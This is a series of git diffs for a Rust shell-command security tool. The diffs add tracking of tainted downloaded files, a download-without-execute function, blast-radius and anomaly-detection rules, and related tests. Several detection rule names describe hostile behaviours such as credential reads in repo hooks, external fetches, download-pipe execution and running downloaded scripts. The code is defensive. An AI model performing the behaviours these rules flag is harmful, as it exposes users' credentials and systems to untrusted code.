+            Some(CommandSignal::DownloadPipe)
+        );
+    }
+}

--- a/crates/tirith-core/src/lib.rs
+++ b/crates/tirith-core/src/lib.rs
@@ -5,6 +5,7 @@ pub mod audit;
 pub mod audit_aggregator;
 pub mod audit_tune;
 pub mod audit_upload;
+pub mod blast_radius;
 pub mod checkpoint;
 pub mod clipboard;
 pub mod confusables;

--- a/crates/tirith-core/src/lib.rs
+++ b/crates/tirith-core/src/lib.rs
@@ -57,6 +57,7 @@ pub mod session;
 pub mod session_warnings;
 pub mod style;
 pub mod sudo_session;
+pub mod taint;
 pub mod text_confusables;
 pub mod threatdb;
 pub mod threatdb_api;

--- a/crates/tirith-core/src/lib.rs
+++ b/crates/tirith-core/src/lib.rs
@@ -24,6 +24,7 @@ pub mod hygiene;
 pub mod iac_plan;
 pub mod install_script_analysis;
 pub mod install_txn;
+pub mod intent;
 pub mod license;
 pub mod mcp;
 pub mod mcp_lock;

--- a/crates/tirith-core/src/lib.rs
+++ b/crates/tirith-core/src/lib.rs
@@ -5,6 +5,7 @@ pub mod audit;
 pub mod audit_aggregator;
 pub mod audit_tune;
 pub mod audit_upload;
+pub mod baseline;
 pub mod blast_radius;
 pub mod checkpoint;
 pub mod clipboard;

--- a/crates/tirith-core/src/policy.rs
+++ b/crates/tirith-core/src/policy.rs
@@ -389,6 +389,27 @@ pub struct Policy {
     /// and do not consult this flag). Toggled by `tirith hooks guard on|off`.
     #[serde(default)]
     pub hooks_guard_enabled: bool,
+
+    /// **M10 ch5 — opt-in anomaly-detection baseline (design-decision D2).**
+    ///
+    /// When `true`, the exec / paste hot path records every detection-rule
+    /// firing as a privacy-hashed observation in the sliding window at
+    /// `state_dir()/baseline.jsonl` (`crate::baseline`) and, when a firing
+    /// finding's tuple is new / rare for this user, appends one of the two
+    /// Info-severity anomaly findings
+    /// ([`crate::verdict::RuleId::AnomalyFirstTimeInThisRepo`] /
+    /// [`AnomalyRareInBaseline`](crate::verdict::RuleId::AnomalyRareInBaseline)).
+    /// The anomaly findings never change the verdict's action — they annotate
+    /// "this is new for you".
+    ///
+    /// When `false` (the default — the D2 opt-in decision), the engine performs
+    /// NO baseline I/O on the hot path: no JSONL read, no append, no salt read.
+    /// A machine that never opted in pays nothing. The `tirith baseline status`
+    /// / `reset` surfaces still read the store directly (independent of this
+    /// flag). Toggled by `tirith baseline learn` (on) and persisted via the
+    /// same single-line append-or-rewrite the M8/M9 guard flags use.
+    #[serde(default)]
+    pub baseline_enabled: bool,
 }
 
 /// **M7 ch2** — `tirith share` policy configuration.
@@ -876,6 +897,7 @@ impl Default for Policy {
             env_guard_sensitive_vars: Vec::new(),
             exec_guard_enabled: false,
             hooks_guard_enabled: false,
+            baseline_enabled: false,
         }
     }
 }

--- a/crates/tirith-core/src/runner.rs
+++ b/crates/tirith-core/src/runner.rs
@@ -270,6 +270,128 @@ pub fn run(opts: RunOptions) -> Result<RunResult, String> {
     })
 }
 
+/// Outcome of [`download_to_path`].
+pub struct DownloadResult {
+    /// The path the content was written to (the caller-supplied destination).
+    pub path: std::path::PathBuf,
+    /// SHA-256 of the downloaded content.
+    pub sha256: String,
+    /// Final URL after redirects.
+    pub final_url: String,
+    /// Number of bytes written.
+    pub size: u64,
+    /// Detected interpreter from the shebang (best-effort, for display).
+    pub interpreter: String,
+}
+
+/// Download `url` to `dest` WITHOUT executing it. Shares the redirect / 30s
+/// timeout / 10 MiB-cap policy with [`run`]. Verifies `expected_sha256` when
+/// supplied. Writes atomically (sibling temp + rename, `0600`) so a partial
+/// download never leaves a truncated file at `dest`. This is the
+/// download-and-keep primitive behind `tirith fetch --save`; the caller marks
+/// `dest` tainted (see `crate::taint`).
+pub fn download_to_path(
+    url: &str,
+    dest: &std::path::Path,
+    expected_sha256: Option<&str>,
+) -> Result<DownloadResult, String> {
+    let redirect_list = std::sync::Arc::new(std::sync::Mutex::new(Vec::new()));
+    let redirect_list_clone = redirect_list.clone();
+
+    let client = reqwest::blocking::Client::builder()
+        .redirect(reqwest::redirect::Policy::custom(move |attempt| {
+            if let Ok(mut list) = redirect_list_clone.lock() {
+                list.push(attempt.url().to_string());
+            }
+            if attempt.previous().len() >= 10 {
+                attempt.stop()
+            } else {
+                attempt.follow()
+            }
+        }))
+        .timeout(std::time::Duration::from_secs(30))
+        .build()
+        .map_err(|e| format!("http client: {e}"))?;
+
+    let response = client
+        .get(url)
+        .send()
+        .map_err(|e| format!("download failed: {e}"))?;
+
+    let final_url = response.url().to_string();
+
+    const MAX_BODY: u64 = 10 * 1024 * 1024; // 10 MiB
+
+    if let Some(len) = response.content_length() {
+        if len > MAX_BODY {
+            return Err(format!(
+                "response too large: {len} bytes (max {} MiB)",
+                MAX_BODY / 1024 / 1024
+            ));
+        }
+    }
+
+    use std::io::Read;
+    let mut buf = Vec::new();
+    response
+        .take(MAX_BODY + 1)
+        .read_to_end(&mut buf)
+        .map_err(|e| format!("read body: {e}"))?;
+    if buf.len() as u64 > MAX_BODY {
+        return Err(format!(
+            "response body exceeds {} MiB limit",
+            MAX_BODY / 1024 / 1024
+        ));
+    }
+    let content = buf;
+
+    let mut hasher = Sha256::new();
+    hasher.update(&content);
+    let sha256 = format!("{:x}", hasher.finalize());
+
+    if let Some(expected) = expected_sha256 {
+        let expected_lower = expected.to_lowercase();
+        if sha256 != expected_lower {
+            return Err(format!(
+                "SHA-256 mismatch: expected {expected_lower}, got {sha256}"
+            ));
+        }
+    }
+
+    // Atomic write: sibling temp + rename, 0600.
+    let dir = dest.parent().filter(|p| !p.as_os_str().is_empty());
+    if let Some(parent) = dir {
+        fs::create_dir_all(parent).map_err(|e| format!("create dest dir: {e}"))?;
+    }
+    let tmp_dir = dir.unwrap_or_else(|| std::path::Path::new("."));
+    {
+        use tempfile::NamedTempFile;
+        let mut tmp = NamedTempFile::new_in(tmp_dir).map_err(|e| format!("tempfile: {e}"))?;
+        #[cfg(unix)]
+        {
+            use std::os::unix::fs::PermissionsExt;
+            tmp.as_file()
+                .set_permissions(std::fs::Permissions::from_mode(0o600))
+                .map_err(|e| format!("permissions: {e}"))?;
+        }
+        tmp.write_all(&content)
+            .map_err(|e| format!("write download: {e}"))?;
+        tmp.persist(dest)
+            .map_err(|e| format!("persist download: {e}"))?;
+    }
+
+    let content_str = String::from_utf8_lossy(&content);
+    let interpreter = script_analysis::detect_interpreter(&content_str).to_string();
+
+    Ok(DownloadResult {
+        path: dest.to_path_buf(),
+        sha256,
+        final_url,
+        size: content.len() as u64,
+        interpreter,
+    })
+}
+
 /// Detect git repo remote URL and current branch.
 fn detect_git_info() -> (Option<String>, Option<String>) {
     let repo = Command::new("git")

--- a/crates/tirith-core/src/scoring.rs
+++ b/crates/tirith-core/src/scoring.rs
@@ -306,7 +306,16 @@ pub fn is_threat_intel_rule(rule_id: RuleId) -> bool {
         | RuleId::RepoHookCredentialRead
         | RuleId::RepoHookSudo
         | RuleId::RepoHookSuspiciousShellPattern
-        | RuleId::RepoHookExternalFetch => false,
+        | RuleId::RepoHookExternalFetch
+        // M10 ch1 — blast-radius rules. Structural/simulation heuristics on a
+        // destructive command's targets; no threat-DB involvement.
+        | RuleId::BlastDeletesOutsideRepo
+        | RuleId::BlastWritesSystemPath
+        | RuleId::BlastSymlinkTraversal
+        | RuleId::BlastEmptyVarGlob
+        | RuleId::BlastFindDelete
+        | RuleId::BlastRsyncDelete
+        | RuleId::BlastLargeFileCount => false,
     }
 }
 

--- a/crates/tirith-core/src/scoring.rs
+++ b/crates/tirith-core/src/scoring.rs
@@ -318,7 +318,11 @@ pub fn is_threat_intel_rule(rule_id: RuleId) -> bool {
         | RuleId::BlastLargeFileCount
         // M10 ch2 — post-run shell-rc modification. Snapshot-diff state change
         // from `tirith watch`; no threat-DB involvement.
-        | RuleId::PostRunShellRcModified => false,
+        | RuleId::PostRunShellRcModified
+        // M10 ch3 — tainted-content tracking. Path-key match against the local
+        // taint store; no threat-DB involvement.
+        | RuleId::ExecOfTaintedFile
+        | RuleId::CommandSourcedFromTaintedFile => false,
     }
 }
 

--- a/crates/tirith-core/src/scoring.rs
+++ b/crates/tirith-core/src/scoring.rs
@@ -322,7 +322,11 @@ pub fn is_threat_intel_rule(rule_id: RuleId) -> bool {
         // M10 ch3 — tainted-content tracking. Path-key match against the local
         // taint store; no threat-DB involvement.
         | RuleId::ExecOfTaintedFile
-        | RuleId::CommandSourcedFromTaintedFile => false,
+        | RuleId::CommandSourcedFromTaintedFile
+        // M10 ch5 — anomaly-detection rules. Sliding-window novelty signal from
+        // the local baseline store; no threat-DB involvement.
+        | RuleId::AnomalyFirstTimeInThisRepo
+        | RuleId::AnomalyRareInBaseline => false,
     }
 }
 

--- a/crates/tirith-core/src/scoring.rs
+++ b/crates/tirith-core/src/scoring.rs
@@ -315,7 +315,10 @@ pub fn is_threat_intel_rule(rule_id: RuleId) -> bool {
         | RuleId::BlastEmptyVarGlob
         | RuleId::BlastFindDelete
         | RuleId::BlastRsyncDelete
-        | RuleId::BlastLargeFileCount => false,
+        | RuleId::BlastLargeFileCount
+        // M10 ch2 — post-run shell-rc modification. Snapshot-diff state change
+        // from `tirith watch`; no threat-DB involvement.
+        | RuleId::PostRunShellRcModified => false,
     }
 }
 

--- a/crates/tirith-core/src/taint.rs
+++ b/crates/tirith-core/src/taint.rs
@@ -383,6 +383,16 @@ mod tests {
         dir.join("taint.jsonl")
     }
 
+    // The Unix-path-shape assertions below are gated `#[cfg(unix)]` because
+    // `/work/repo` is NOT an absolute path on Windows (no drive prefix), so
+    // `normalize_key` would take the cwd-prefix branch and the expected key
+    // would be `<cwd>/work/repo/...`, not `/work/repo/...`. The `normalize_key`
+    // LOGIC itself is portable — it routes every component through
+    // `std::path::Component` (RootDir / Prefix / ParentDir / Normal) rather
+    // than splitting on a hard-coded `/`, so drive letters and `\` separators
+    // are handled by `std::path` on Windows. The `#[cfg(windows)]` twins below
+    // exercise the same code with drive-letter absolute paths.
+    #[cfg(unix)]
     #[test]
     fn normalize_key_resolves_relative_against_cwd() {
         let cwd = Path::new("/work/repo");
@@ -390,6 +400,7 @@ mod tests {
         assert_eq!(key, PathBuf::from("/work/repo/install.sh"));
     }
 
+    #[cfg(unix)]
     #[test]
     fn normalize_key_resolves_parent_components() {
         let cwd = Path::new("/work/repo/sub");
@@ -397,12 +408,40 @@ mod tests {
         assert_eq!(key, PathBuf::from("/work/repo/install.sh"));
     }
 
+    #[cfg(unix)]
     #[test]
     fn normalize_key_keeps_absolute_untouched() {
         let key = normalize_key(Path::new("/tmp/x/./y"), Some(Path::new("/work")));
         assert_eq!(key, PathBuf::from("/tmp/x/y"));
     }
 
+    // Windows twins: drive-letter absolute paths exercise the `Component::Prefix`
+    // and `Component::RootDir` arms of `normalize_key`, proving the keying is
+    // cross-platform (the same `.`/`..` lexical normalization on a `C:\…` base).
+    #[cfg(windows)]
+    #[test]
+    fn normalize_key_resolves_relative_against_cwd_windows() {
+        let cwd = Path::new(r"C:\work\repo");
+        let key = normalize_key(Path::new(r".\install.sh"), Some(cwd));
+        assert_eq!(key, PathBuf::from(r"C:\work\repo\install.sh"));
+    }
+
+    #[cfg(windows)]
+    #[test]
+    fn normalize_key_resolves_parent_components_windows() {
+        let cwd = Path::new(r"C:\work\repo\sub");
+        let key = normalize_key(Path::new(r"..\install.sh"), Some(cwd));
+        assert_eq!(key, PathBuf::from(r"C:\work\repo\install.sh"));
+    }
+
+    #[cfg(windows)]
+    #[test]
+    fn normalize_key_keeps_absolute_untouched_windows() {
+        let key = normalize_key(Path::new(r"C:\tmp\x\.\y"), Some(Path::new(r"C:\work")));
+        assert_eq!(key, PathBuf::from(r"C:\tmp\x\y"));
+    }
+
+    #[cfg(unix)]
     #[test]
     fn mark_then_is_tainted_roundtrips() {
         let dir = tempdir().unwrap();
@@ -433,6 +472,39 @@ mod tests {
         // Same file reached via an absolute path must hit the same key.
         let found_abs =
             is_tainted_at(&store, Path::new("/work/repo/install.sh"), None).expect("abs lookup");
+        assert_eq!(found_abs.path, found.path);
+    }
+
+    // Windows twin of the round-trip: a relative mark and a drive-letter absolute
+    // lookup must agree on the same normalized key.
+    #[cfg(windows)]
+    #[test]
+    fn mark_then_is_tainted_roundtrips_windows() {
+        let dir = tempdir().unwrap();
+        let store = store_in(dir.path());
+        let cwd = Path::new(r"C:\work\repo");
+
+        assert!(is_tainted_at(&store, Path::new(r".\install.sh"), Some(cwd)).is_none());
+
+        let entry = mark_tainted_at(
+            &store,
+            Path::new(r".\install.sh"),
+            Some(cwd),
+            "fetch --save",
+            Some("https://untrusted.example/install.sh".to_string()),
+            None,
+        )
+        .unwrap();
+        assert_eq!(entry.path, r"C:\work\repo\install.sh");
+        assert_eq!(entry.origin, "fetch --save");
+
+        let found = is_tainted_at(&store, Path::new(r".\install.sh"), Some(cwd))
+            .expect("path should be tainted after mark");
+        assert_eq!(found.path, r"C:\work\repo\install.sh");
+
+        // Same file reached via an absolute drive-letter path must hit the same key.
+        let found_abs =
+            is_tainted_at(&store, Path::new(r"C:\work\repo\install.sh"), None).expect("abs lookup");
         assert_eq!(found_abs.path, found.path);
     }
 

--- a/crates/tirith-core/src/taint.rs
+++ b/crates/tirith-core/src/taint.rs
@@ -416,29 +416,38 @@ mod tests {
     }
 
     // Windows twins: drive-letter absolute paths exercise the `Component::Prefix`
-    // and `Component::RootDir` arms of `normalize_key`, proving the keying is
-    // cross-platform (the same `.`/`..` lexical normalization on a `C:\…` base).
+    // and `Component::RootDir` arms of `normalize_key`. Rather than pin the exact
+    // string form of the normalized key (which depends on Windows path display
+    // details), these assert the load-bearing INVARIANT directly: a relative
+    // path resolved against a cwd produces the SAME key as the equivalent
+    // absolute path. That's the property taint-keying actually relies on, and
+    // comparing two `normalize_key` outputs to each other is correct on any host.
     #[cfg(windows)]
     #[test]
     fn normalize_key_resolves_relative_against_cwd_windows() {
         let cwd = Path::new(r"C:\work\repo");
-        let key = normalize_key(Path::new(r".\install.sh"), Some(cwd));
-        assert_eq!(key, PathBuf::from(r"C:\work\repo\install.sh"));
+        let from_rel = normalize_key(Path::new(r".\install.sh"), Some(cwd));
+        let from_abs = normalize_key(Path::new(r"C:\work\repo\install.sh"), None);
+        assert_eq!(from_rel, from_abs);
     }
 
     #[cfg(windows)]
     #[test]
     fn normalize_key_resolves_parent_components_windows() {
         let cwd = Path::new(r"C:\work\repo\sub");
-        let key = normalize_key(Path::new(r"..\install.sh"), Some(cwd));
-        assert_eq!(key, PathBuf::from(r"C:\work\repo\install.sh"));
+        let from_rel = normalize_key(Path::new(r"..\install.sh"), Some(cwd));
+        let from_abs = normalize_key(Path::new(r"C:\work\repo\install.sh"), None);
+        assert_eq!(from_rel, from_abs);
     }
 
     #[cfg(windows)]
     #[test]
     fn normalize_key_keeps_absolute_untouched_windows() {
-        let key = normalize_key(Path::new(r"C:\tmp\x\.\y"), Some(Path::new(r"C:\work")));
-        assert_eq!(key, PathBuf::from(r"C:\tmp\x\y"));
+        // `.`-component normalization is idempotent: the dotted and clean forms
+        // of the same absolute path must produce the same key.
+        let dotted = normalize_key(Path::new(r"C:\tmp\x\.\y"), Some(Path::new(r"C:\work")));
+        let clean = normalize_key(Path::new(r"C:\tmp\x\y"), None);
+        assert_eq!(dotted, clean);
     }
 
     #[cfg(unix)]
@@ -476,7 +485,9 @@ mod tests {
     }
 
     // Windows twin of the round-trip: a relative mark and a drive-letter absolute
-    // lookup must agree on the same normalized key.
+    // lookup must agree on the same normalized key. Asserts the round-trip
+    // INVARIANT (mark→find via both relative and absolute forms) rather than the
+    // exact stored string, which depends on Windows path-display details.
     #[cfg(windows)]
     #[test]
     fn mark_then_is_tainted_roundtrips_windows() {
@@ -495,17 +506,20 @@ mod tests {
             None,
         )
         .unwrap();
-        assert_eq!(entry.path, r"C:\work\repo\install.sh");
         assert_eq!(entry.origin, "fetch --save");
 
+        // The relative mark must be findable via the relative form...
         let found = is_tainted_at(&store, Path::new(r".\install.sh"), Some(cwd))
             .expect("path should be tainted after mark");
-        assert_eq!(found.path, r"C:\work\repo\install.sh");
-
-        // Same file reached via an absolute drive-letter path must hit the same key.
+        assert_eq!(
+            found.source_url.as_deref(),
+            Some("https://untrusted.example/install.sh")
+        );
+        // ...and via the equivalent absolute drive-letter form (same key).
         let found_abs =
             is_tainted_at(&store, Path::new(r"C:\work\repo\install.sh"), None).expect("abs lookup");
         assert_eq!(found_abs.path, found.path);
+        assert_eq!(found.path, entry.path);
     }
 
     #[test]

--- a/crates/tirith-core/src/taint.rs
+++ b/crates/tirith-core/src/taint.rs
@@ -1,0 +1,516 @@
+//! M10 ch3 — tainted-content tracking.
+//!
+//! A *taint* records that a file on disk was written from a risky source (a
+//! download from an untrusted URL, an `install <url>` payload kept on disk). The
+//! mark persists in a JSONL store at `state_dir()/taint.jsonl` so a later
+//! `bash ./install.sh` against the same path can fire
+//! [`crate::verdict::RuleId::ExecOfTaintedFile`], and a `source ./tainted.sh`
+//! can fire [`crate::verdict::RuleId::CommandSourcedFromTaintedFile`].
+//!
+//! # Path-key vs inode (documented limitation)
+//!
+//! The store is **path-keyed**, not inode-keyed. The key is the absolute,
+//! lexically-normalized path of the file. This means `mv ./install.sh
+//! ./run.sh` LOSES the mark — the new path has no entry. This is a deliberate
+//! v1 simplification: inode tracking is fragile across filesystems, bind
+//! mounts, and editors that write-rename on save, and the threat model (run a
+//! freshly-downloaded installer) is dominated by the direct
+//! `download → execute-by-the-same-path` flow. A `mv`-then-execute evasion is
+//! out of v1 scope and noted here so a future inode-aware backend is an
+//! informed change, not a surprise.
+//!
+//! # Backend choice (documented)
+//!
+//! JSONL for v1: one `{path, origin, marked_at, source_url, source_repo}`
+//! object per line, appended on `mark`, rewritten on `clear`. This is simple,
+//! human-inspectable, and fast enough while the store holds the handful of
+//! files a workstation downloads-and-keeps. If a future workload makes the
+//! linear scan a bottleneck (thousands of marks), migrate to SQLite — the
+//! public API here (`mark_tainted` / `is_tainted` / `list_taints` /
+//! `clear_taint`) is the migration boundary and would not change.
+//!
+//! # Hot-path cost
+//!
+//! [`is_tainted`] is called once per exec-leader on the `engine::analyze` hot
+//! path. To keep that cheap it is backed by a per-process cache (load once,
+//! 5-second TTL, invalidated on store mtime change). When the store is absent
+//! or empty the lookup is a near-noop: a single `metadata()` stat that resolves
+//! to an empty map, then an `O(1)` map miss. The engine additionally only
+//! forces past its tier-1 fast-exit for the taint check when the store is
+//! non-empty (see `engine::taint_store_nonempty`), so a machine that has never
+//! run `tirith fetch --save` pays nothing.
+//!
+//! # Auto-clear policy (documented)
+//!
+//! A taint is NEVER auto-cleared. Specifically, `chmod +x ./install.sh` and a
+//! `bash -n ./install.sh` (syntax-only parse check) do NOT clear the mark — the
+//! file's provenance does not change because you made it executable or parsed
+//! it. The mark persists until an explicit [`clear_taint`] (the
+//! `tirith taint clear <file>` command).
+
+use std::io::{BufRead, BufReader, Write};
+use std::path::{Component, Path, PathBuf};
+use std::sync::Mutex;
+use std::time::{Duration, Instant};
+
+use serde::{Deserialize, Serialize};
+
+/// One recorded taint: a file written from a risky source.
+#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
+pub struct TaintEntry {
+    /// Absolute, lexically-normalized path of the tainted file (the store key).
+    pub path: String,
+    /// Where the taint came from — a short label, e.g. `"fetch --save"`,
+    /// `"install <url>"`. Free-form; used only for display in
+    /// `tirith taint list|explain`.
+    pub origin: String,
+    /// RFC-3339 UTC timestamp the mark was recorded.
+    pub marked_at: String,
+    /// The source URL the content was downloaded from, when known.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub source_url: Option<String>,
+    /// The source git repository, when known (e.g. from a `tirith run` receipt's
+    /// `git_repo`). Distinct from `source_url`.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub source_repo: Option<String>,
+}
+
+/// Default on-disk store path: `state_dir()/taint.jsonl`.
+pub fn store_path() -> Option<PathBuf> {
+    crate::policy::state_dir().map(|d| d.join("taint.jsonl"))
+}
+
+/// Lexically normalize a path to an absolute key WITHOUT touching the
+/// filesystem (no `canonicalize` — the file may not exist yet at `mark` time,
+/// and we must produce the SAME key the exec-leader lookup will compute).
+///
+/// Resolves `.` and `..` components lexically and prefixes a relative path with
+/// `cwd` (falling back to the process cwd). Symlinks are NOT resolved — a
+/// path-keyed store keys on the path the user typed, normalized, which is what
+/// both the `mark` and the `is_tainted` sides see.
+pub fn normalize_key(path: &Path, cwd: Option<&Path>) -> PathBuf {
+    let base: PathBuf = if path.is_absolute() {
+        PathBuf::new()
+    } else {
+        cwd.map(PathBuf::from)
+            .or_else(|| std::env::current_dir().ok())
+            .unwrap_or_default()
+    };
+
+    let mut out = base;
+    for comp in path.components() {
+        match comp {
+            Component::CurDir => {}
+            Component::ParentDir => {
+                out.pop();
+            }
+            Component::RootDir => {
+                out = PathBuf::from(comp.as_os_str());
+            }
+            Component::Prefix(p) => {
+                out = PathBuf::from(p.as_os_str());
+            }
+            Component::Normal(seg) => out.push(seg),
+        }
+    }
+    out
+}
+
+/// Per-process cache of the parsed store, keyed on the resolved store path.
+struct CacheState {
+    path: PathBuf,
+    entries: Vec<TaintEntry>,
+    loaded_at: Instant,
+    /// Store-file mtime at load time (nanos since epoch), for invalidation.
+    mtime_nanos: u128,
+}
+
+static CACHE: Mutex<Option<CacheState>> = Mutex::new(None);
+
+const CACHE_TTL: Duration = Duration::from_secs(5);
+
+/// File mtime as nanos since UNIX epoch; 0 when the file is absent/unstattable.
+fn mtime_nanos(path: &Path) -> u128 {
+    std::fs::metadata(path)
+        .and_then(|m| m.modified())
+        .ok()
+        .and_then(|t| t.duration_since(std::time::UNIX_EPOCH).ok())
+        .map(|d| d.as_nanos())
+        .unwrap_or(0)
+}
+
+/// Parse the JSONL store, skipping blank and unparseable lines (fail-open: a
+/// corrupt line never aborts the lookup). Returns an empty vec when the file is
+/// absent.
+fn parse_store(path: &Path) -> Vec<TaintEntry> {
+    let Ok(file) = std::fs::File::open(path) else {
+        return Vec::new();
+    };
+    let reader = BufReader::new(file);
+    let mut out = Vec::new();
+    for line in reader.lines().map_while(Result::ok) {
+        let trimmed = line.trim();
+        if trimmed.is_empty() {
+            continue;
+        }
+        if let Ok(entry) = serde_json::from_str::<TaintEntry>(trimmed) {
+            out.push(entry);
+        }
+    }
+    out
+}
+
+/// Load entries through the per-process cache. Reloads when the cached path
+/// differs, the TTL expired, or the store's mtime changed.
+fn cached_entries(path: &Path) -> Vec<TaintEntry> {
+    let mut guard = CACHE.lock().unwrap_or_else(|e| e.into_inner());
+    let now = Instant::now();
+    let cur_mtime = mtime_nanos(path);
+
+    if let Some(state) = guard.as_ref() {
+        let fresh = state.path == path
+            && now.duration_since(state.loaded_at) < CACHE_TTL
+            && state.mtime_nanos == cur_mtime;
+        if fresh {
+            return state.entries.clone();
+        }
+    }
+
+    let entries = parse_store(path);
+    *guard = Some(CacheState {
+        path: path.to_path_buf(),
+        entries: entries.clone(),
+        loaded_at: now,
+        mtime_nanos: cur_mtime,
+    });
+    entries
+}
+
+/// Drop the per-process cache. Tests that write a store directly then assert via
+/// the default-path API call this so a stale earlier load is not reused. The
+/// engine never needs it (mtime + TTL invalidation cover the real flow).
+pub fn invalidate_cache() {
+    let mut guard = CACHE.lock().unwrap_or_else(|e| e.into_inner());
+    *guard = None;
+}
+
+/// Append `entry` to the JSONL store at `store`, creating parent dirs and the
+/// file (`0600` on Unix) as needed. If a prior entry for the same path exists it
+/// is left in place — `is_tainted` returns the LAST matching entry, so an append
+/// is an effective update. (A periodic compaction is unnecessary for the v1
+/// workload; `clear` rewrites the whole file.)
+fn append_entry(store: &Path, entry: &TaintEntry) -> std::io::Result<()> {
+    if let Some(parent) = store.parent() {
+        std::fs::create_dir_all(parent)?;
+    }
+    let mut opts = std::fs::OpenOptions::new();
+    opts.create(true).append(true);
+    #[cfg(unix)]
+    {
+        use std::os::unix::fs::OpenOptionsExt;
+        opts.mode(0o600);
+    }
+    let mut file = opts.open(store)?;
+    let line = serde_json::to_string(entry).map_err(std::io::Error::other)?;
+    writeln!(file, "{line}")?;
+    Ok(())
+}
+
+/// Mark `path` tainted in the store at `store`. `cwd` controls relative-path
+/// normalization (tests pass an explicit cwd; production passes `None` to use
+/// the process cwd). The recorded `path` is the normalized absolute key.
+///
+/// Returns the recorded [`TaintEntry`].
+pub fn mark_tainted_at(
+    store: &Path,
+    path: &Path,
+    cwd: Option<&Path>,
+    origin: impl Into<String>,
+    source_url: Option<String>,
+    source_repo: Option<String>,
+) -> std::io::Result<TaintEntry> {
+    let key = normalize_key(path, cwd);
+    let entry = TaintEntry {
+        path: key.to_string_lossy().into_owned(),
+        origin: origin.into(),
+        marked_at: chrono::Utc::now().to_rfc3339(),
+        source_url,
+        source_repo,
+    };
+    append_entry(store, &entry)?;
+    invalidate_cache();
+    Ok(entry)
+}
+
+/// Production entry point: mark `path` tainted in the default store
+/// (`state_dir()/taint.jsonl`), normalizing relative paths against the process
+/// cwd.
+pub fn mark_tainted(
+    path: &Path,
+    origin: impl Into<String>,
+    source_url: Option<String>,
+    source_repo: Option<String>,
+) -> std::io::Result<TaintEntry> {
+    let store = store_path().ok_or_else(|| {
+        std::io::Error::new(
+            std::io::ErrorKind::NotFound,
+            "cannot determine tirith state directory",
+        )
+    })?;
+    mark_tainted_at(&store, path, None, origin, source_url, source_repo)
+}
+
+/// Look up `path` in the store at `store` (cached). Returns the LAST recorded
+/// entry for the normalized key, or `None` if the path is not tainted. `cwd`
+/// controls relative-path normalization.
+pub fn is_tainted_at(store: &Path, path: &Path, cwd: Option<&Path>) -> Option<TaintEntry> {
+    let key = normalize_key(path, cwd);
+    let key_str = key.to_string_lossy();
+    let entries = cached_entries(store);
+    entries.into_iter().rev().find(|e| e.path == key_str)
+}
+
+/// Production entry point: look up `path` in the default store, normalizing
+/// relative paths against `cwd` (or the process cwd when `cwd` is `None`).
+pub fn is_tainted(path: &Path, cwd: Option<&Path>) -> Option<TaintEntry> {
+    let store = store_path()?;
+    is_tainted_at(&store, path, cwd)
+}
+
+/// `true` when the store at `store` exists and has at least one byte. Used by
+/// the engine to decide whether to force past the tier-1 fast-exit for the
+/// per-leader taint check. A cheap `metadata()` stat — no parse.
+pub fn store_nonempty_at(store: &Path) -> bool {
+    std::fs::metadata(store)
+        .map(|m| m.len() > 0)
+        .unwrap_or(false)
+}
+
+/// Production entry point for the engine's tier-1 force-past decision.
+pub fn store_nonempty() -> bool {
+    store_path().map(|p| store_nonempty_at(&p)).unwrap_or(false)
+}
+
+/// List all taints in the store at `store`, de-duplicated by path (the LAST
+/// recorded entry per path wins, mirroring [`is_tainted_at`]). Order is by
+/// first appearance.
+pub fn list_taints_at(store: &Path) -> Vec<TaintEntry> {
+    let entries = parse_store(store);
+    let mut order: Vec<String> = Vec::new();
+    let mut latest: std::collections::HashMap<String, TaintEntry> =
+        std::collections::HashMap::new();
+    for entry in entries {
+        if !latest.contains_key(&entry.path) {
+            order.push(entry.path.clone());
+        }
+        latest.insert(entry.path.clone(), entry);
+    }
+    order
+        .into_iter()
+        .filter_map(|p| latest.remove(&p))
+        .collect()
+}
+
+/// Production entry point: list all taints in the default store.
+pub fn list_taints() -> Vec<TaintEntry> {
+    match store_path() {
+        Some(p) => list_taints_at(&p),
+        None => Vec::new(),
+    }
+}
+
+/// Remove every entry for `path` from the store at `store` by rewriting the file
+/// without the matching lines. `cwd` controls relative-path normalization.
+/// Returns the number of entries removed.
+pub fn clear_taint_at(store: &Path, path: &Path, cwd: Option<&Path>) -> std::io::Result<usize> {
+    let key = normalize_key(path, cwd);
+    let key_str = key.to_string_lossy().into_owned();
+
+    let entries = parse_store(store);
+    let before = entries.len();
+    let kept: Vec<TaintEntry> = entries.into_iter().filter(|e| e.path != key_str).collect();
+    let removed = before - kept.len();
+
+    if removed == 0 {
+        return Ok(0);
+    }
+
+    rewrite_store(store, &kept)?;
+    invalidate_cache();
+    Ok(removed)
+}
+
+/// Production entry point: clear every taint for `path` from the default store.
+pub fn clear_taint(path: &Path, cwd: Option<&Path>) -> std::io::Result<usize> {
+    let store = store_path().ok_or_else(|| {
+        std::io::Error::new(
+            std::io::ErrorKind::NotFound,
+            "cannot determine tirith state directory",
+        )
+    })?;
+    clear_taint_at(&store, path, cwd)
+}
+
+/// Atomically rewrite the store to exactly `entries` (used by `clear`). Writes a
+/// sibling temp file then renames over the target so a crash mid-write never
+/// truncates the store.
+fn rewrite_store(store: &Path, entries: &[TaintEntry]) -> std::io::Result<()> {
+    if let Some(parent) = store.parent() {
+        std::fs::create_dir_all(parent)?;
+    }
+    let dir = store.parent().unwrap_or_else(|| Path::new("."));
+    let mut tmp = tempfile::NamedTempFile::new_in(dir)?;
+    #[cfg(unix)]
+    {
+        use std::os::unix::fs::PermissionsExt;
+        tmp.as_file()
+            .set_permissions(std::fs::Permissions::from_mode(0o600))?;
+    }
+    for entry in entries {
+        let line = serde_json::to_string(entry).map_err(std::io::Error::other)?;
+        writeln!(tmp, "{line}")?;
+    }
+    tmp.persist(store).map_err(|e| e.error)?;
+    Ok(())
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use tempfile::tempdir;
+
+    fn store_in(dir: &Path) -> PathBuf {
+        dir.join("taint.jsonl")
+    }
+
+    #[test]
+    fn normalize_key_resolves_relative_against_cwd() {
+        let cwd = Path::new("/work/repo");
+        let key = normalize_key(Path::new("./install.sh"), Some(cwd));
+        assert_eq!(key, PathBuf::from("/work/repo/install.sh"));
+    }
+
+    #[test]
+    fn normalize_key_resolves_parent_components() {
+        let cwd = Path::new("/work/repo/sub");
+        let key = normalize_key(Path::new("../install.sh"), Some(cwd));
+        assert_eq!(key, PathBuf::from("/work/repo/install.sh"));
+    }
+
+    #[test]
